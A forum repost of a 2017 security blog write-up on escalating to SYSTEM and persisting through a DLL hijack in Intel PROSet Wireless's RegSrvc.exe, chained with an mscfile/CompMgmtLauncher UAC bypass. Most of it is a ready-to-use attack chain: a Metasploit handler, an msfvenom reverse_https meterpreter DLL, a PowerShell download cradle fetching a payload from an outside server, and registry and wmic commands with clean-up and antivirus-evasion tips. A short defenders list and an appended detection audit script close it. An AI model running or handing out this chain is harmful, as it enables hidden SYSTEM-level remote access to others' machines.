Nytro Posted September 17, 2017

SYSTEM-level Persistence via Intel PROSet Wireless RpcRtRemote.dll Backdoor

Posted on March 17, 2017 by x4zx

** update 4/14/2017: powershell exploit code: https://github.com/0rbz/Intel_Inside

The Intel PROSet Wireless connection management software is vulnerable to a DLL hijack that yields privilege escalation to SYSTEM and SYSTEM-level persistence via a backdoored "RpcRtRemote.dll" file. The hijack on its own only turns local-administrator rights into SYSTEM, because the drop location is admin-writable, so to cross the UAC boundary and write the backdoored file into "C:\Program Files\Common Files\Intel\WirelessCommon\" we chain it with a CompMgmtLauncher.exe UAC bypass (similar to enigma0x3's and others' work).

The issue is that "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" (a service that runs as Local System) loads "RpcRtRemote.dll" from its own directory, and that file does not exist on a default installation of the package. The loader searches the application's own directory first, so whatever we drop there under that name is what gets loaded. We execute it manually once for a SYSTEM-level shell, and since RegSrvc.exe starts as a Local System service at boot time, the same DLL also gives us SYSTEM-level reverse_https meterpreter persistence at every start-up.

This was tested on a fully patched 64-bit Windows 7 machine with the 64-bit version of the PROSet Wireless package ("Wireless_19.40.0_PROSet64_Win7.exe"), using a 64-bit reverse_https meterpreter DLL payload. It probably also works on x86, but the 64-bit DLL buys a bit more "evasion" against antivirus detection. This vector is also handy as a fairly discreet command-and-control channel out of a target network, since the beacon comes from rundll32.exe spawned by a legitimate vendor service rather than from anything the user launched.

All of this assumes you already have a reverse_https meterpreter shell on the box as a user in the local Administrators group, with UAC set to anything other than "Always Notify", and just need another way to "getsystem" on your target.
A vulnerable host should have the "RegSrvc.exe" process running, so check for it with something like:

    tasklist | find "RegSrvc.exe"

The resource file I'm using for the listener is something like this:

intel.rc:

    use exploit/multi/handler
    set ExitOnSession false
    set LHOST 0.0.0.0
    set LPORT 5555
    set PAYLOAD windows/x64/meterpreter/reverse_https
    set HandlerSSLCert custom.pem
    exploit -j

The first step is to create your 64-bit backdoored RpcRtRemote.dll file:

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.13.26 LPORT=5555 -f dll > RpcRtRemote.dll

Host that DLL on a web server you control; we'll use PowerShell to pull it down into the target directory later. Then create the following PowerShell script and host it on a web server you control as well, with the "$pl_url" variable pointing at your backdoored RpcRtRemote.dll:

RpcRtRemote_downloader.ps1:

    $dlx = New-Object System.Net.WebClient
    $pl_url = 'https://x42.obscurechannel.com/RpcRtRemote.dll';
    $lfile = 'C:\Program Files\Common Files\Intel\WirelessCommon\RpcRtRemote.dll';
    $dlx.DownloadFile($pl_url,$lfile);

Let's test. From your UAC-restricted admin shell, execute the following (this could all be scripted into a PowerShell or Metasploit module). It runs the CompMgmtLauncher.exe UAC bypass via wmic (because it works): the hijacked mscfile handler starts an elevated PowerShell, which fetches RpcRtRemote_downloader.ps1 through a download cradle, and that script in turn drops the backdoored RpcRtRemote.dll (64-bit reverse_https meterpreter payload) into the WirelessCommon directory:

    reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex -Command (New-Object Net.WebClient).DownloadString('https://yourserver.com/RpcRtRemote_downloader.ps1')" /f
    wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

Wait before running the next step: the DLL download may take a few seconds depending on its size, bandwidth, etc. Confirm that RpcRtRemote.dll has actually appeared in the WirelessCommon directory before continuing.
Re-execute the UAC bypass, this time to launch a second, elevated instance of "RegSrvc.exe", which loads our DLL:

    reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" /f
    wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

Clean up:

    reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

At this point you should have a new elevated meterpreter session and be able to run "getsystem". The DLL will also persist as an NT AUTHORITY\SYSTEM shell at every reboot, because the RegSrvc.exe service loads it each time it starts.

The flow: (diagram from the original post, not reproduced here)

Defenders:

- Configure UAC to "Always Notify"
- Remove users from the local Administrators group
- Monitor for rogue connections originating from rundll32.exe (only effective if the attacker doesn't migrate to another valid process)
- Alert on writes to HKCU\Software\Classes\mscfile\shell\open\command and on CompMgmtLauncher.exe being spawned from cmd.exe or wmic, since that is how this chain elevates, and on an unsigned RpcRtRemote.dll appearing in the WirelessCommon directory, which a default install never contains

- @0rbz_

Source: https://www.obscurechannel.com/x42/?p=378
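The following audit script is an added example, not code from the original post or from 0rbz's Intel_Inside repository. It checks, on one host, the conditions the write-up relies on: whether RegSrvc.exe is installed and running, whether the RpcRtRemote.dll hijack slot is empty or has already been filled with an unsigned file, whether the WirelessCommon directory is writable by non-administrators (in which case the UAC bypass step would not even be needed), whether UAC is at "Always Notify", and whether any loaded user hive carries the HKCU mscfile handler key the bypass plants. Only the paths and registry locations named in the post are taken from it; the service lookup by PathName (the post does not give the service name), the UAC registry values, the SHA-256 computation and all function names are assumptions of this script. It is meant to be run from an elevated Windows PowerShell 3.0 or later prompt.

```powershell
# Audit for the Intel PROSet Wireless RpcRtRemote.dll hijack and the mscfile UAC-bypass primitive.
# Added example: paths and registry keys are those in the write-up; everything else is assumed.
# Run elevated so the service, ACL and HKEY_USERS queries succeed.

$WirelessCommon = Join-Path ${env:ProgramFiles} 'Common Files\Intel\WirelessCommon'
$RegSrvcExe     = Join-Path $WirelessCommon 'RegSrvc.exe'
$HijackDll      = Join-Path $WirelessCommon 'RpcRtRemote.dll'

function Get-RegSrvcStatus {
    # Same question as `tasklist | find "RegSrvc.exe"`, plus which service owns the binary and
    # what account it runs as (expected: LocalSystem). Service name is not known, so match by path.
    $svc = Get-WmiObject Win32_Service | Where-Object { $_.PathName -like '*RegSrvc.exe*' } | Select-Object -First 1
    $name = $null; $runsAs = $null
    if ($svc) { $name = $svc.Name; $runsAs = $svc.StartName }
    New-Object PSObject -Property @{
        BinaryPresent = Test-Path -LiteralPath $RegSrvcExe
        Running       = [bool](Get-Process -Name RegSrvc -ErrorAction SilentlyContinue)
        ServiceName   = $name
        RunsAs        = $runsAs
    }
}

function Get-HijackDllStatus {
    # A default install has no RpcRtRemote.dll, so its presence is a finding on its own; an
    # unsigned copy next to a signed vendor binary is the planted payload described in the post.
    if (-not (Test-Path -LiteralPath $HijackDll)) {
        return New-Object PSObject -Property @{ Present = $false }
    }
    $sig    = Get-AuthenticodeSignature -FilePath $HijackDll
    $signer = $null
    if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
    $digest = [Security.Cryptography.SHA256]::Create().ComputeHash([IO.File]::ReadAllBytes($HijackDll))
    New-Object PSObject -Property @{
        Present         = $true
        SignatureStatus = $sig.Status            # msfvenom output shows as NotSigned
        Signer          = $signer
        SHA256          = ([BitConverter]::ToString($digest) -replace '-', '')
        LastWrite       = (Get-Item -LiteralPath $HijackDll).LastWriteTime
    }
}

function Get-WritableByNonAdmins {
    # If low-privilege principals can create files here, no UAC bypass is required to plant the DLL.
    $lowPriv = 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    (Get-Acl -LiteralPath $WirelessCommon).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles'
    }
}

function Get-UacPosture {
    # "Always Notify" is ConsentPromptBehaviorAdmin=2 with PromptOnSecureDesktop=1. The default (5)
    # lets auto-elevating Windows binaries such as CompMgmtLauncher.exe elevate without a prompt.
    $p = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    New-Object PSObject -Property @{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AlwaysNotify = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -eq 2 -and $p.PromptOnSecureDesktop -eq 1)
    }
}

function Get-MscfileHijack {
    # The bypass plants <user hive>\Software\Classes\mscfile\shell\open\command; a clean profile has
    # no such key (the genuine handler lives under HKLM\Software\Classes). Only loaded hives are seen.
    Get-ChildItem Registry::HKEY_USERS | ForEach-Object {
        $key = "Registry::$($_.Name)\Software\Classes\mscfile\shell\open\command"
        if (Test-Path -LiteralPath $key) {
            New-Object PSObject -Property @{
                Hive    = $_.Name
                Command = (Get-ItemProperty -LiteralPath $key).'(default)'
            }
        }
    }
}

function Invoke-RpcRtRemoteAudit {
    $r = New-Object PSObject -Property @{
        RegSrvc   = Get-RegSrvcStatus
        Dll       = Get-HijackDllStatus
        WeakAcl   = @(Get-WritableByNonAdmins)
        Uac       = Get-UacPosture
        MscHijack = @(Get-MscfileHijack)
    }
    $findings = @()
    if ($r.RegSrvc.BinaryPresent -and -not $r.Dll.Present) { $findings += 'RegSrvc.exe installed and RpcRtRemote.dll absent: hijack slot is open' }
    if ($r.Dll.Present -and $r.Dll.SignatureStatus -ne 'Valid') { $findings += 'Unsigned RpcRtRemote.dll in WirelessCommon: treat as planted' }
    if ($r.WeakAcl.Count -gt 0) { $findings += 'WirelessCommon is writable by non-administrators' }
    if (-not $r.Uac.AlwaysNotify) { $findings += 'UAC is not at Always Notify: auto-elevate bypass will work for local admins' }
    if ($r.MscHijack.Count -gt 0) { $findings += 'mscfile handler hijacked in a loaded user hive' }
    $r | Add-Member -MemberType NoteProperty -Name Findings -Value $findings -PassThru
}

$audit = Invoke-RpcRtRemoteAudit
$audit.Findings
$audit.Dll, $audit.Uac, $audit.MscHijack | Format-List
```

An attacker runs this before the chain to confirm the slot is open and UAC is not at "Always Notify"; a responder runs it afterwards to find the planted DLL (hash it for the rest of the fleet) and the leftover handler key, bearing in mind that the post's clean-up step deletes that key, so its absence proves nothing on its own.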